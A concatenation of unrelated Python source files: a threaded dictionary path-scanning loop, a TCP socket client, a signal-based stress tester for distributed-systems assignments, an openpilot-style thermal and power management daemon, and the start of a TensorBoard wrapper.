if not tester.scan(path, response):
result = None
break
return result, response
def is_paused(self):
return self.paused
def is_running(self):
return self.running
def finish_threads(self):
self.running = False
self.finished_event.set()
def is_stopped(self):
return self.running_threads_count == 0
def decrease_threads(self):
self.running_threads_count -= 1
def increase_threads(self):
self.running_threads_count += 1
def decrease_rate(self):
self.rate -= 1
def increase_rate(self):
self.rate += 1
threading.Timer(1, self.decrease_rate).start()
def thread_proc(self):
self.play_event.wait()
try:
path = next(self.dictionary)
while path:
try:
# Pause if the request rate exceeded the maximum
while self.maxrate and self.rate >= self.maxrate:
pass
self.increase_rate()
status, response = self.scan(path)
result = Path(path=path, status=status, response=response)
if status:
self.matches.append(result)
for callback in self.match_callbacks:
callback(result)
else:
for callback in self.not_found_callbacks:
callback(result)
except RequestException as e:
for callback in self.error_callbacks:
callback(path, e.args[0]["message"])
continue
finally:
if not self.play_event.is_set():
self.decrease_threads()
self.paused_semaphore.release()
self.play_event.wait()
self.increase_threads()
                path = next(self.dictionary)  # Raises StopIteration when it finishes
if not self.running:
break
time.sleep(self.delay)
except StopIteration:
pass
|
socket.py
|
# ============================================================================
# FILE: socket.py
# AUTHOR: Rafael Bodill <justRafi at gmail.com>
# License: MIT license
# ============================================================================
import socket
from threading import Thread
from queue import Queue
from time import time, sleep
class Socket(object):
def __init__(self, host, port, commands, context, timeout):
self._enc = context.get('encoding', 'utf-8')
self._eof = False
self._outs = []
self._timeout = timeout
self._context = context
self._sock = self.connect(host, port, self._timeout)
self._welcome = self.receive()
self.sendall(commands)
self._queue_out = Queue()
self._thread = Thread(target=self.enqueue_output)
self._thread.start()
@property
def welcome(self):
return self._welcome
def eof(self):
return self._eof
def kill(self):
if self._sock is not None:
self._sock.close()
self._sock = None
self._queue_out = None
self._thread.join(1.0)
self._thread = None
def sendall(self, commands):
for command in commands:
self._sock.sendall('{}\n'.format(command).encode(self._enc))
def receive(self, bytes=1024):
return self._sock.recv(bytes).decode(
self._enc, errors='replace')
def connect(self, host, port, timeout):
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_ADDRCONFIG):
family, socket_type, proto, canon_name, sa = res
sock = None
try:
sock = socket.socket(family, socket_type, proto)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error as e:
if sock is not None:
sock.close()
if e is not None:
raise e
else:
raise OSError('Socket: getaddrinfo returns an empty list')
def enqueue_output(self):
if not self._queue_out:
return
buffer = self.receive(2048)
buffering = True
while buffering:
if '\n' in buffer:
(line, buffer) = buffer.split('\n', 1)
self._queue_out.put(line)
else:
more = self.receive()
if not more:
buffering = False
else:
buffer += more
def communicate(self, timeout):
if not self._sock:
return []
start = time()
outs = []
if self._queue_out.empty():
sleep(0.1)
while not self._queue_out.empty() and time() < start + timeout:
outs.append(self._queue_out.get_nowait())
if self._thread.is_alive() or not self._queue_out.empty():
return outs
self._eof = True
self._sock = None
self._thread = None
        self._queue_out = None
return outs
|
stress_.py
|
#!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import threading, subprocess
import signal
import random
from enum import Enum
from collections import defaultdict, OrderedDict
PROCESSES_BASE_IP = 11000
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, procs, msgs):
self.processes = procs
self.messages = msgs
def generatePerfectLinksConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{} 1\n".format(self.messages))
return (hostsfile, configfile)
def generateFifoConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{}\n".format(self.messages))
return (hostsfile, configfile)
def generateLcausalConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{}\n".format(self.messages))
for i in range(1, self.processes + 1):
others = list(range(1, self.processes + 1))
others.remove(i)
random.shuffle(others)
if len(others) // 2 > 0:
others = others[0: len(others) // 2]
config.write("{} {}\n".format(i, ' '.join(map(str, others))))
return (hostsfile, configfile)
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = self.processes // 2 if self.processes % 2 == 1 else (self.processes - 1) // 2
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes+1))
random.shuffle(selectProc)
selectOp = [ProcessState.STOPPED] * int(1000 * self.attemptsRatio['STOP']) + \
[ProcessState.RUNNING] * int(1000 * self.attemptsRatio['CONT']) + \
[ProcessState.TERMINATED] * int(1000 * self.attemptsRatio['TERM'])
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print("Sending {} to process {}".format(ProcessInfo.stateToSignalStr(op), proc))
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.RUNNING))
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.TERMINATED))
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.RUNNING))
def run(self):
if self.concurrency > 1:
threads = [threading.Thread(target=self.stress) for _ in range(self.concurrency)]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != 'run.sh':
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ['java', '-jar', bin_java]
else:
raise Exception("`{}` could not find a binary to execute. Make sure you build before validating".format(runscriptPath))
procs = []
for pid in range(1, processes+1):
cmd_ext = ['--id', str(pid),
'--hosts', hostsFilePath,
'--output', os.path.join(outputDirPath, 'proc{:02d}.output'.format(pid)),
configFilePath]
stdoutFd = open(os.path.join(outputDirPath, 'proc{:02d}.stdout'.format(pid)), "w")
stderrFd = open(os.path.join(outputDirPath, 'proc{:02d}.stderr'.format(pid)), "w")
procs.append((pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd)))
return procs
def main(processes, messages, runscript, testType, logsDir, testConfig):
if not os.path.isdir(logsDir):
raise ValueError('Directory `{}` does not exist'.format(logsDir))
validation = Validation(processes, messages)
if testType == "perfect":
hostsFile, configFile = validation.generatePerfectLinksConfig(logsDir)
elif testType == "fifo":
hostsFile, configFile = validation.generateFifoConfig(logsDir)
elif testType == "lcausal":
hostsFile, configFile = validation.generateLcausalConfig(logsDir)
else:
raise ValueError('Unrecognised test type')
    procs = None  # ensure the name exists for the finally block even if startup fails
    try:
# Start the processes and get their PIDs
procs = startProcesses(processes, runscript, hostsFile, configFile, logsDir)
# Create the stress test
st = StressTest(procs,
testConfig['concurrency'],
testConfig['attempts'],
testConfig['attemptsDistribution'])
for (logicalPID, procHandle) in procs:
print("Process with logicalPID {} has PID {}".format(logicalPID, procHandle.pid))
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
input("Press `Enter` when all processes have finished processing messages.")
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print("Process {} exited with {}".format(logicalPID, procHandle.returncode))
# Monitor which processes have exited
monitors = [threading.Thread(target=waitForProcess, args=(logicalPID, procHandle, mutex)) for (logicalPID, procHandle) in procs]
[p.start() for p in monitors]
[p.join() for p in monitors]
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r",
"--runscript",
required=True,
dest="runscript",
help="Path to run.sh",
)
parser.add_argument(
"-t",
"--test",
choices=["perfect", "fifo", "lcausal"],
required=True,
dest="testType",
help="Which test to run",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
        'concurrency' : 8, # How many threads are interfering with the running processes
        'attempts' : 8, # How many interfering attempts each thread makes
        'attemptsDistribution' : { # Probability with which an interfering thread will
            'STOP': 0.48, # select an interfering action (make sure they add up to 1)
'CONT': 0.48,
'TERM':0.04
}
}
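    # Optional sanity check: the interference probabilities above should sum to 1,
    # as the comments request.
    assert abs(sum(testConfig['attemptsDistribution'].values()) - 1.0) < 1e-9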
main(results.processes, results.messages, results.runscript, results.testType, results.logsDir, testConfig)
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.controls.lib.pid import PIController
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
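# Worked example of the band hysteresis: starting in ThermalStatus.green (no lower
# bound, max 80.0), a component temperature of 85 exceeds 80.0, so the status jumps
# to yellow (75.0..96.0). It then stays yellow until the temperature drops below
# 75.0 (back to green) or rises above 96.0 (up to red).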
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
def read_tz(x):
if x is None:
return 0
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def setup_eon_fan():
os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")
last_eon_fan_val = None
def set_eon_fan(val):
global last_eon_fan_val
if last_eon_fan_val is None or last_eon_fan_val != val:
bus = SMBus(7, force=True)
try:
i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
bus.write_i2c_block_data(0x3d, 0, [i])
except OSError:
# tusb320
if val == 0:
bus.write_i2c_block_data(0x67, 0xa, [0])
else:
bus.write_i2c_block_data(0x67, 0xa, [0x20])
bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
bus.close()
last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options
_FAN_SPEEDS = [0, 16384, 32768, 65535]
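# Example of the hysteresis: at max_cpu_temp = 60.0 the high thresholds give
# new_speed_h = 16384 (first temp_h above 60 is 65.) while the low thresholds give
# new_speed_l = 32768 (first temp_l above 60 is 72.5), so a fan already running at
# 16384 or 32768 keeps its current speed instead of oscillating.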
def handle_fan_eon(controller, max_cpu_temp, fan_speed, ignition):
new_speed_h = next(speed for speed, temp_h in zip(_FAN_SPEEDS, _TEMP_THRS_H) if temp_h > max_cpu_temp)
new_speed_l = next(speed for speed, temp_l in zip(_FAN_SPEEDS, _TEMP_THRS_L) if temp_l > max_cpu_temp)
if new_speed_h > fan_speed:
# update speed if using the high thresholds results in fan speed increment
fan_speed = new_speed_h
elif new_speed_l < fan_speed:
# update speed if using the low thresholds results in fan speed decrement
fan_speed = new_speed_l
set_eon_fan(fan_speed // 16384)
return fan_speed
def handle_fan_uno(controller, max_cpu_temp, fan_speed, ignition):
new_speed = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
if not ignition:
new_speed = min(30, new_speed)
return new_speed
last_ignition = False
def handle_fan_tici(controller, max_cpu_temp, fan_speed, ignition):
global last_ignition
controller.neg_limit = -(80 if ignition else 30)
controller.pos_limit = -(30 if ignition else 0)
if ignition != last_ignition:
controller.reset()
fan_pwr_out = -int(controller.update(
setpoint=75,
measurement=max_cpu_temp,
feedforward=interp(max_cpu_temp, [60.0, 100.0], [0, -80])
))
last_ignition = ignition
return fan_pwr_out
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
hw_state = HardwareState(
network_type=network_type,
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=HARDWARE.get_modem_temperatures(),
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
except Exception:
cloudlog.exception("Error getting network status")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
fan_speed = 0
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
handle_fan = None
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
restart_triggered_ts = 0.
panda_state_ts = 0.
# TODO: use PI controller for UNO
controller = PIController(k_p=0, k_i=2e-3, neg_limit=-80, pos_limit=0, rate=(1 / DT_TRML))
is_openpilot_view_enabled = 0
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if handle_fan is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
cloudlog.info("Setting up TICI fan handler")
handle_fan = handle_fan_tici
elif is_uno or PC:
cloudlog.info("Setting up UNO fan handler")
handle_fan = handle_fan_uno
else:
cloudlog.info("Setting up EON fan handler")
#setup_eon_fan()
#handle_fan = handle_fan_eon
elif params.get_bool("IsOpenpilotViewEnabled") and is_openpilot_view_enabled == 0:
is_openpilot_view_enabled = 1
onroad_conditions["ignition"] = True
elif not params.get_bool("IsOpenpilotViewEnabled") and is_openpilot_view_enabled == 1:
is_openpilot_view_enabled = 0
onroad_conditions["ignition"] = False
#else:
# if sec_since_boot() - panda_state_ts > 3.:
# if onroad_conditions["ignition"]:
# cloudlog.error("Lost panda connection while onroad")
# onroad_conditions["ignition"] = False
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
#if handle_fan is not None:
# fan_speed = handle_fan(controller, max_comp_temp, fan_speed, onroad_conditions["ignition"])
# msg.deviceState.fanSpeedPercentDesired = fan_speed
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
program.py
|
import argparse
import os
import signal
import sys
import threading
from tensorboard import program
from gr_tensorboard.version import VERSION
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from .application import gr_tensorboard_wsgi
from .logging import _logger
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
class GRTensorBoard(program.TensorBoard):
def main(self, ignored_argv=('',)):
if self.flags.inspect:
_logger.log_message_info('Not bringing up GRTensorBoard, but inspecting event files.')
event_file = os.path.expanduser(self.flags.event_file)
efi.inspect(self.flags.logdir, event_file, self.flags.tag)
return 0
try:
server = self._make_server()
